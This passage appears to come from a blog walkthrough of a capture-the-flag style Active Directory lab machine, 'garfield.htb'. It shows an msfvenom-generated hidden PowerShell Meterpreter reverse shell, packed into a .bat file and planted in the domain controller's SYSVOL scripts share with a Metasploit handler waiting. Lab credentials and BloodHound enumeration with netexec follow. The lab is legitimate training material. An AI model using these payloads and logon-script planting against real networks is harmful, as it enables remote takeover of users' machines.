OWNER:BUILTIN\Administrators
GROUP:NT AUTHORITY\SYSTEM
ACL:CREATOR OWNER:ALLOWED/OI|CI|IO/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/OI|CI/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|IO/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/RWXPO
ACL:BUILTIN\Server Operators:ALLOWED/OI|CI/READ
ACL:GARFIELD\IT Support:ALLOWED/OI|CI/RWXD
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo smbcacls //DC01/NETLOGON '/' -U j.arbuckle --password 'Th1sD4mnC4t!@1978'
REVISION:1
CONTROL:SR|PD|DI|DP
OWNER:BUILTIN\Administrators
GROUP:NT AUTHORITY\SYSTEM
ACL:CREATOR OWNER:ALLOWED/OI|CI|IO/FULL
ACL:NT AUTHORITY\Authenticated Users:ALLOWED/OI|CI/READ
ACL:NT AUTHORITY\SYSTEM:ALLOWED/OI|CI/FULL
ACL:BUILTIN\Administrators:ALLOWED/OI|CI|IO/FULL
ACL:BUILTIN\Administrators:ALLOWED/0x0/RWXPO
ACL:BUILTIN\Server Operators:ALLOWED/OI|CI/READ
ACL:GARFIELD\IT Support:ALLOWED/OI|CI/RWXD</code></pre></div><p>With-out being said let&#8217;s create our .bat files with MSFVenom:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo printf '@echo off\r\n%s\r\n' "$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f psh-cmd | tail -n 1)"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 7503 bytes

@echo off
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACg. . .[SNIP]. . .dADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo vi attack.bat</code></pre></div><p>And put that file into the SMB share:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo smbclient \\\\DC01.garfield.htb\\SYSVOL -U j.arbuckle --password 'Th1sD4mnC4t!@1978'                                                 
Try "help" to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Wed Aug 13 07:04:43 2025
  ..                                  D        0  Wed Aug 13 07:04:43 2025
  garfield.htb                       Dr        0  Wed Aug 13 07:04:43 2025

                9250815 blocks of size 4096. 976489 blocks available
smb: \&gt; cd garfield.htb/scripts/
smb: \garfield.htb\scripts\&gt; put attack.bat
putting file attack.bat as \garfield.htb\scripts\attack.bat (6.3 kB/s) (average 6.3 kB/s)
smb: \garfield.htb\scripts\&gt; ls
  .                                   D        0  Mon Apr  6 09:40:30 2026
  ..                                  D        0  Mon Apr  6 09:40:30 2026
  attack.bat                          A     7514  Mon Apr  6 09:40:30 2026
  printerDetect.bat                   A      217  Fri Sep 12 18:20:29 2025

                9250815 blocks of size 4096. 976487 blocks available
smb: \garfield.htb\scripts\&gt;</code></pre></div><p>Let&#8217;s set-up our Metasploit:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; exploit"    
[*] Using configured payload generic/shell_reverse_tcp
payload =&gt; windows/x64/meterpreter/reverse_tcp
LHOST =&gt; tun0
LPORT =&gt; 9001
[*] Started reverse TCP handler on 10.10.14.30:9001 
. . .[SNIP]. . .</code></pre></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RxNO!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RxNO!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 424w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 848w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 1272w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RxNO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png" width="668" height="371" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:371,&quot;width&quot;:668,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:450013,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RxNO!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 424w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 848w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 1272w, https://substackcdn.com/image/fetch/$s_!RxNO!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F34bd8662-abcf-4f49-b527-890a8c0c63ec_668x371.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>After waiting I&#8217;ve not yet see a call-back!!</p><ol start="4"><li><p><em>Active Directory BloodHound</em></p></li></ol><p>Let&#8217;s BloodHound first with our first credential:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --bloodhound -c all --dns-server 10.129.195.37
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
LDAP        10.129.195.37   389    DC01             Resolved collection methods: dcom, psremote, session, trusts, localadmin, acl, group, objectprops, rdp, container
LDAP        10.129.195.37   389    DC01             Done in 1M 20S
LDAP        10.129.195.37   389    DC01             Compressing output into /root/.nxc/logs/DC01_10.129.195.37_2026-04-06_091927_bloodhound.zip</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ cat users.txt 
Administrator
Guest
krbtgt
krbtgt_8245
j.arbuckle
l.wilson
l.wilson_adm</code></pre></div><p>J.Arbuckle (Our unlucky guy):</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!yd6i!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!yd6i!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!yd6i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:107562,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!yd6i!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!yd6i!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6aa68537-df55-491c-9529-6acd26be6d77_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This guy have. . .nothing!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!VrEA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!VrEA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!VrEA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:166290,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!VrEA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!VrEA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1ace601a-395b-4d1d-811e-3363e58b8b9f_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But he was a member of IT SUPPORT:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UXOc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UXOc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UXOc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:182359,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UXOc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!UXOc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9665b95d-0132-4b28-9ba8-f1f436e0a756_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Might say the ONLY:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fNsy!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!fNsy!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!fNsy!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!fNsy!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf3d1a1-e90d-469f-acc4-66c7c5eb44c9_1590x965.png" width="1590" height="965" 